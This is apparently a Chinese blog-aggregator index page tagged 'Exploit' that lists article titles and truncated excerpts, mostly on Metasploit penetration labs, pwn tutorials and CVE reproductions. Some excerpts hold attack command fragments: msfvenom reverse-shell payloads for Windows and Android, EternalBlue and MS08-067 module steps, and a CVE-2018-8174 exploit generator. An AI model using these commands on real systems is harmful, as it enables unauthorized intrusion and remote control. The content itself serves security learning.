Exploit 第17页

JIT引擎触发RowHammer可行性研究

xlab·2015/05/2615:460x00前言作者:R3dF09@腾讯玄武实验室2015年3月GoogleProjectZero发表文章ExploitingtheDRAMrowhammerbugtogainkernelprivileges

weixin_34120274·2020-08-19 21:31

【10.21总结】一个渗透测试练习实例——发现未知的漏洞(Race condition)

Write-up地址：Exploitinganunknownvulnerability作者：AbhishekBundela这篇文章跟我之前看到的文章不太一样，作者是按照一个练习的方式简单描述了他对一个应用进行渗透测试的过程

weixin_30886233·2020-08-19 21:05

linux kernel pwn学习之堆漏洞利用+bypass smap、smep

LinuxkernelHeapexploitLinux内核使用的是slab/slub分配器，与glibc下的ptmalloc有许多类似的地方。

haivk·2020-08-19 19:33

pwn学习---attach调试与ret2libc

0x01attach调试我们将4.c文件编译成41.exe，然后使用python脚本运行C语言程序如下：#includevoidexploit(){system("/bin/sh");}voidmain

gclome·2020-08-19 19:14

Buffer Overflow Exploit

IntroductionIaminterestedinexploitingbinaryfiles.ThefirsttimeIcameacrossthebufferoverflowexploit,Icouldn'tactuallyimplementit.Manyoftheexistingsourcesonthewebwereoutdated

Omni-Space·2020-08-19 18:34

MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4)

/usr/bin/python#Remoteexploitforthe0dayWindowsDNSRPCservicevulnerabilityas#describedin[url]http://www.securityfocus.com

iiprogram·2020-08-19 17:49

CVE-2017-3248简单复现

我是这样操作的目标跟windows在一个段,linux是另一个段的,我的虚拟机windows主机上`java-cpysoserial.jarysoserial.exploit.JRMPListener1099CommonsCollections5

ddr12231·2020-08-19 17:04

Lab1 Buffer OverFlow

LabOverViewImportantNote:Thiscourse’slabs,includingthislab,askyoutodesignexploitsandtoperformattacks.Theseexploitsandattacksarerealisticenoughthatyoumightbeabletousethemtoperformareal-worldattack

Thare_Lam·2020-08-19 16:04

Stack Based Windows Buffer Overflow Tutorial

IntroductionOnethingIhavealwaysmaintainedisthataspiringorpracticingpenetrationtesterswhouseanexploitationproduct

weixin_34072159·2020-08-19 16:25

3.26日每日一词inertia

Thecity'stourismresourcesdidn’texploitbecauseofitsgovernmentalinertia.

霄肖·2020-08-19 10:32

线程池的原理和实现c语言

线程池原理及实现1、线程池简介对于线程池，wiki上面这样描述Athreadpoolisatechniquethatallowsdeveloperstoexploittheconcurrencyofmodernprocessorsinaneasyandefficientmanner.It

JJ新城·2020-08-19 05:05

基于内容的图像检索技术(3):部分论文阅读总结

[1]NgYH,YangF,DavisLS.ExploitingLocalFeaturesfromDeepNetworksforImageRetrieval[J].2015.传统的VLAD算法从sift

张叫张大卫·2020-08-19 05:49

周报(1):WordSup、FTSN、R-FCN、FCIS(2020-8-1)

WordSup《WordSup:ExploitingWordAnnotationsforCharacterbasedTextDetection》Motivation对于很多语言和数学公式，字符是它们的基本组成单元

linjiet·2020-08-19 03:52

格式化字符串漏洞利用五、爆破

五、爆破原文：ExploitingFormatStringVulnerabilities作者：[email protected]译者：飞龙日期：2001.9.1版本：v1.2当利用这种漏洞，例如缓冲区溢出或者格式化字符串漏洞时

布客飞龙·2020-08-18 23:15

metasploit

进入终端：msfconsole查看漏洞：searchms10-046（漏洞名称）查看具体年份漏洞：searchcve：2018查看具体类型：searchtype：exploit使用攻击模块：use+查看漏洞中的模块查看使用漏洞需要哪些参数

weixin_42727740·2020-08-18 23:51

metasploit 下利用永恒之蓝攻击靶机win7

实验环境：一台win7靶机，kali作为攻击机控制台下输入msfconsolesearchms17-010useexploit/windows/smb/ms17_010_eternalblue接下来可以看一下受这个漏洞影响的操作系统可以看出受影响的有两个

weixin_34061482·2020-08-18 22:39

MS17_010永恒之蓝实战攻击

这里先利用shadowbrokers的“官方”漏洞poc程序exe进行exploit。然后Doublepulsar将meterpreter-shell的dll注入到远程主机的系统进程当中。

uiop_uiop_uiop·2020-08-18 22:15

格式化字符串漏洞利用

学习资料：https://ctf-wiki.github.io/ctf-wiki/pwn/linux/fmtstr/fmtstr_exploit/https://veritas501.space/2017

xiaoyuyulala·2020-08-18 21:05

给kali的Metasploit下添加一个新的exploit

注意头文件classMetasploit3'securitytest','Description'=>%q{Thismoduleexploitsabufferoverflow.},'Author'=>'

qq_27446553·2020-08-18 21:24

Metasploit文件目录与入侵基本概念

漏洞攻击(exploit)黑客利用一个安全缺陷进入系统当中，本质上就是一些恶意的代码数据包，借助这些代码黑客可以入侵某台机器。

si1ence_whitehat·2020-08-18 21:48

kali下的metaspolit实验1

本文章仅为督促本人学习第一个实验exploit模块:exploit/multi/samba/usermap_scriptkali版本：2017.2最新版虚拟机网络配置：kali网络配置：靶机：Metaspolit_ubuntu

勿喋·2020-08-18 20:26

格式化字符串漏洞利用七、工具

七、工具原文：ExploitingFormatStringVulnerabilities作者：[email protected]译者：飞龙日期：2001.9.1版本：v1.2一旦利用完成，或者甚至在利用开发过程中

布客飞龙·2020-08-18 19:55

OpenMRS反序列化漏洞（CVE-2018-19276）

参考：https://www.bishopfox.com/news/2019/02/openmrs-insecure-object-deserialization/https://www.exploit-db.com

caiqiiqi·2020-08-18 19:14

Joomla-3.4.6远程代码执行漏洞利用与分析

0x02漏洞简介在exploit-db(https://www.e

Adminxe·2020-08-18 18:00

crash bug 分析

security_bprm_checkhookssuccess[494.253444]do_sys_openhookssuccess[494.255155]kerneltriedtoexecuteNX-protectedpage-exploitattempt

danielliu861·2020-08-18 15:49

利用Metasploit制作PDF木马

实验过程：一、攻击机端：1.查看自己的ip地址：ifconfig2.进入metasploit控制台：msfconsole3.利用PDF文件漏洞（Adobe公司之前发布的一个漏洞）：useexploit/

____-7·2020-08-18 02:35

MSF-Shellcode生成和MS15-020 渗透利用

A.msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.86.130LPORT=4444-fexe>/qq.exe2、重新打开一个配置窗口useexploit

Tee.·2020-08-17 20:46

pwn的一些环境搭建

pwntools库安装pwntools是一个CTF框架和漏洞利用开发库，用Python开发，由rapid设计，旨在让使用者简单快速的编写exploit。

weixin_30871905·2020-08-17 16:36

Ubuntu 16.04 for Pwn

在此列出自己做pwn题的虚拟机ubuntu配置，更加期待WSL2上线后，使用docker部署pwn环境做题主要工具：vim：安装插件，为后续编写exploitpeda：gdb插件，调试神器，谁用谁知道pwngdb

weixin_30799995·2020-08-17 16:03

Windows exploit初探-通过修改seh get shell

原文地址：https://www.fuzzysecurity.com/tutorials/expDev/3.html发现看雪有翻译的：https://bbs.pediy.com/user-686289-2.htm有漏洞的软件链接：https://pan.baidu.com/s/1XIVgoo7t2kCwbd1wZLJ7Zw提取码：khmh在xp虚拟机里安装上面下载的安装包，然后用下面的脚本创建一个

fkbugs·2020-08-17 14:33

Windows exploit初探-栈溢出

学习链接：https://www.fuzzysecurity.com根据上面的链接，学习windowsexploit实验前的准备含有漏洞的软件：链接：https://pan.baidu.com/s/1KoqDfeYn-JTMD2OvkD2ErQ

fkbugs·2020-08-17 14:33

kali 在手机上安装 apk

meterpreter/reverse_tcplhost=192.168.2.116lport=9999R>/root/520.apk2.开始操作2.1.启动msfconsolemsfconsole2.2.加载模块useexploit

AinUser·2020-08-17 11:08

阅读日记：computer organization and design——RISC-V——chapter4-1

TheProcessorAbstract:Thischapterdescribeshowprocessorsexploitimplicitparallelism.它包含对实现处理器所使用的原理和技术的解释

yjn18021006815·2020-08-16 22:40

mips EJTAG简介

EJTAG：MIPSextensionofJTAG.ItexploitstheinfrastructureprovidedbytheIEEE1149.1JTAGTestAccessPort(TAP)standardtoprovideanexternalinterface

淡泊的猪·2020-08-16 22:53

渗透实验1

msf>searchms08-067搜索ms08-067相关漏洞的攻击模块msf>useexploit/windows/smb/ms08_067_netapi使用刚才搜索到的漏洞msfexploit(ms08

wylululu·2020-08-16 16:38

渗透实验二

msf>searchms10-002msf>useexploit/windows/browser/ms10_002_auroramsfexploit(ms10_002_aurora)>setsrvhost192.168.147.130msfexploit

wylululu·2020-08-16 16:38

metasploit渗透测试指南-学习笔记-第二章

##专业术语:###1.渗透攻击（exploit）：渗透攻击是指由攻击者或者渗透测试者利用系统、应用或者服务中的安全漏洞，所进行的攻击的行为。

happen.·2020-08-16 16:37

IE浏览器 CVE-2018-8174漏洞复现

gitclonehttps://github.com/Sch01ar/CVE-2018-8174_EXP生成pythonCVE-2018-8174.py-uhttp://192.168.31.117/exploit.html-oexploit.rtf-i192.168.31.117

曈曚·2020-08-16 16:27

渗透- 基于metasploit的内网渗透 - ms08-067漏洞利用及其原理分析

基本命令：Useexploit/windows/smb/ms08_067_netapiSetrhost192.168.10.2Setlhost192.168.10.1Setlport7777Setpayloadwindow

joke_ljh·2020-08-16 16:39

CVE-2015-7857 Joomla注入漏洞利用工具（Python）

漏洞分析英文版本在这里：https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Acces

weixin_30603633·2020-08-16 15:05

Metasploit中Exploit模块check方法详述

Exploit模块的check方法用来检测一台远程主机是否有漏洞能够被利用。check方法默认的实施仅返回check方法不被Exploit模块支持。

阿迪达拉参上·2020-08-16 15:02

实现一个Web版的类Metasploit的攻击框架

pythonsafecatcli.py-mexp_name-n[exploit_file_name

隐形人真忙·2020-08-16 15:07

NSA HELPED BRITISH SPIES FIND SECURITY HOLES IN JUNIPER FIREWALLS

ATOP-SECRETdocumentdatedFebruary2011revealsthatBritishspyagencyGCHQ,withtheknowledgeandapparentcooperationoftheNSA,acquiredthecapabilitytocovertlyexploitsecurityvulnerabilitiesin13differentmodelsoffir

stonesharp·2020-08-16 14:47

InfoSec容易混淆的概念Threat, vulnerability, risk (Note)

Threat–Anythingthatcanexploitavulnerability,intentionallyoraccidentally,andobtain,dama

strings_lei·2020-08-16 14:16

渗透测试的各个阶段

测试人员是否可以使用可能导致服务瘫痪的漏洞利用代码（即exploit）

maqiang_jin·2020-08-16 13:05

计算机漏洞安全相关的概念POC | EXP | VUL | CVE | 0DAY

2.EXPEXP，Exploit，中文意思是“漏洞利用”。意思是一段对漏洞如何利用的详细说明或

lixue20141529·2020-08-16 13:14

客户端渗透之——基于PDF文件格式的渗透攻击

details/86633022攻击机Kali192.168.175.128靶机WinXP192.168.175.130漏洞程序：AdobeReader9.01.生成PDF文件msfconsoleuseexploit

冰河·2020-08-16 13:50

metasploit运行run vnc

msf>useexploit/windows/smb/ms08_067_netapimsfexploit(ms08_067_netapi)>setRHOST192.168.1.142RHOST=>192.168.1.142msfexploit

feier7501·2020-08-16 12:55

漏洞复现：MS14-064 OLE远程代码执行漏洞

系统2.确定IP地址后，KaliLinux开启msf模块，准备攻击测试3.在这里我们使用MS14-064OLE远程代码执行漏洞，开始搜索MS14-064（searchMS14-064）4.我们利用useexploit

dingbai2663·2020-08-16 12:03

使用metasploit进行渗透攻击步骤

攻击过程主要分为以下几步：1.searchXXX（扫描某漏洞对应的模块）2.useexploit/xxx/xxx/...

叶落秋霜·2020-08-16 11:22

推荐频道

Exploit